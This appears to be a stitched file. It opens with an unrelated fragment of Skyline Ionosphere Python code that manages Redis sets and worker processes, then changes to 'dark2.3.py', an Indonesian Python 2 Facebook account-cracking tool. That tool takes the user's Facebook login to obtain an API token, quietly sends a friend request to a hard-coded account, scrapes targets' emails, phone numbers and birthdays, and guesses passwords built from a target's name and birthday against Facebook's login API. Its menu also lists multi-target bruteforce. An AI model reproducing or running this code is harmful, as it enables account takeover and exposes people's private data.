# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name not in self.ionosphere_smtp_alerter_metrics:
# self.ionosphere_smtp_alerter_metrics.append(base_name)
if base_name not in ionosphere_smtp_alerter_metrics:
redis_set = 'ionosphere.ionosphere_smtp_alerter_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name not in self.ionosphere_smtp_alerter_metrics:
# if base_name not in self.ionosphere_smtp_alerter_metrics:
# self.ionosphere_non_smtp_alerter_metrics.append(base_name)
if base_name not in ionosphere_smtp_alerter_metrics:
redis_set = 'ionosphere.ionosphere_non_smtp_alerter_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# The Redis sets are used here to replace the self.ionosphere_*
# Manager().list() objects
ionosphere_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
ionosphere_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere_smtp_alerter_metrics Redis set')
ionosphere_smtp_alerter_metrics = []
ionosphere_non_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_non_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
ionosphere_non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere_non_smtp_alerter_metrics Redis set')
ionosphere_non_smtp_alerter_metrics = []
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# logger.info('smtp_alerter_metrics :: %s' % str(len(self.ionosphere_smtp_alerter_metrics)))
# logger.info('ionosphere_non_smtp_alerter_metrics :: %s' % str(len(self.ionosphere_non_smtp_alerter_metrics)))
logger.info('smtp_alerter_metrics :: %s' % str(len(ionosphere_smtp_alerter_metrics)))
logger.info('ionosphere_non_smtp_alerter_metrics :: %s' % str(len(ionosphere_non_smtp_alerter_metrics)))
if ionosphere_job:
# @added 20190326 - Feature #2484
# First process ionosphere_echo to create any missing
try:
ionosphere_echo_enabled = settings.IONOSPHERE_ECHO_ENABLED
except:
ionosphere_echo_enabled = False
# @added 20190403 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# If there are more than 2 metric check files, do not run
# process_ionosphere_echo to create echo features profiles
run_process_ionosphere_echo = True
if metric_var_files_count > 2:
run_process_ionosphere_echo = False
logger.info(
'not running process_ionosphere_echo as there are %s metric check files to be checked' % (
str(metric_var_files_count)))
# @added 20190527 - Feature #2484: FULL_DURATION feature profiles
# Branch #3002: docker
# Only process if there is a ionosphere.unique_metrics Redis set
if run_process_ionosphere_echo:
ionosphere_unique_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
ionosphere_unique_metrics = self.redis_conn_decoded.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get Redis smembers ionosphere.unique_metrics')
ionosphere_unique_metrics = []
# @added 20190527 - Feature #2484: FULL_DURATION feature profiles
if not ionosphere_unique_metrics:
run_process_ionosphere_echo = False
logger.info('there are no metrics in the Redis ionosphere.unique_metrics set, skipping process_ionosphere_echo')
# If there are more than 4 metric check files set Ionosphere to
# busy so that Ionosphere alternates between checking the normal
# Ionosphere Mirage features profiles and the Ionosphere echo
# features profiles on subsequent checks of a metric so that
# when Ionosphere is busy it is not checking both sets of
# features profiles on every run.
if metric_var_files_count > 4:
ionosphere_busy = True
if ionosphere_echo_enabled and run_process_ionosphere_echo:
# Spawn a single process_ionosphere_echo process
function_name = 'process_ionosphere_echo'
pids = []
spawned_pids = []
pid_count = 0
now = time()
for i in range(1, IONOSPHERE_PROCESSES + 1):
try:
p = Process(target=self.process_ionosphere_echo, args=(i, metric_check_file))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count), str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# Self monitor the process and terminate if the
# process_ionosphere_echo has run for too long
try:
ionosphere_echo_max_fp_create_time = settings.IONOSPHERE_ECHO_MAX_FP_CREATE_TIME
except:
ionosphere_echo_max_fp_create_time = 55
p_starts = time()
while time() - p_starts <= ionosphere_echo_max_fp_create_time:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds' % (
str(IONOSPHERE_PROCESSES),
function_name, time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes' % function_name)
logger.info('processing - %s' % str(metric_var_files_sorted[0]))
function_name = 'spin_process'
# @added 20170109 - Feature #1854: Ionosphere learn
# Added the learn variable to spawn a spawn_learn_process when
# required.
# @added 20170112 - Feature #1854: Ionosphere learn - Redis ionosphere.learn.work namespace
# Ionosphere learn needs Redis work sets
# When a features profile is created there needs to be work added to a Redis
# set
# When a human makes a features profile, we want Ionosphere to make a
# use_full_duration_days features profile after valid_learning_duration
# (e.g. 3361) has passed.
if learn_job:
logger.info('processing - learn work queue - %s' % str(work_queue_items))
function_name = 'spawn_learn_process'
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
now = time()
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# for i in range(1, settings.IONOSPHERE_PROCESSES + 1):
for i in range(1, IONOSPHERE_PROCESSES + 1):
if ionosphere_job:
try:
# @modified 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Added ionosphere_busy if there are queued checks
# to ensure that Ionosphere echo is rate limited if a
# lot of metrics become anomalous and that Ionosphere
# alternates between normal Mirage features profiles
# comparisons and Ionosphere echo features profiles
# during busy times.
# p = Process(target=self.spin_process, args=(i, metric_check_file))
p = Process(target=self.spin_process, args=(i, metric_check_file, ionosphere_busy))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count),
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# @added 20170113 - Feature #1854: Ionosphere learn - Redis ionosphere.learn.work namespace
if learn_job:
try:
p = Process(target=self.spawn_learn_process, args=(i, int(now)))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count),
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# Self monitor processes and terminate if any spin_process has run
# for too long
p_starts = time()
# @modified 20180621 - Feature #2404: Ionosphere - fluid approximation
# Increase run time to 55 seconds to allow for Min-Max scaling
# while time() - p_starts <= 20:
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Added ionosphere_echo which takes more time
# while time() - p_starts <= 55:
try:
ionosphere_max_runtime = settings.IONOSPHERE_MAX_RUNTIME
except:
ionosphere_max_runtime = 120
while time() - p_starts <= ionosphere_max_runtime:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds' % (
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(IONOSPHERE_PROCESSES),
function_name, time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes' % function_name)
if ionosphere_job:
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
for p in pids:
if p.is_alive():
# @modified 20191031 - Bug #3296: Ionosphere spawn_learn_process hanging on docker
# Branch #3002 - docker
# Use terminate not join for docker
# logger.info('stopping %s - %s' % (function_name, str(p.is_alive())))
# p.join()
logger.info('killing %s - %s' % (function_name, str(p.is_alive())))
p.terminate()
# @added 20170108 - Feature #1830: Ionosphere alerts
# Reset added lists of ionosphere_smtp_alerter_metrics and
# ionosphere_non_smtp_alerter_metrics
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.ionosphere_smtp_alerter_metrics[:] = []
# self.ionosphere_non_smtp_alerter_metrics[:] = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# delete_redis_sets = [
# 'ionosphere.ionosphere_smtp_alerter_metrics',
# 'ionosphere.ionosphere_non_smtp_alerter_metrics',
# ]
delete_redis_sets = [
'ionosphere.ionosphere_smtp_alerter_metrics.old',
'ionosphere.ionosphere_non_smtp_alerter_metrics.old',
]
for i_redis_set in delete_redis_sets:
redis_set_to_delete = i_redis_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
|
dark2.3.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mEdition-2.3\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m Mr.KenFlu \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFACEBOOK \x1b[1;91m: \x1b[1;92m \x1b[92m? \x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mWa \x1b[1;91m: \x1b[1;92\x1b[92m085325260497\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.facebook.com/yoga.wira.188')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
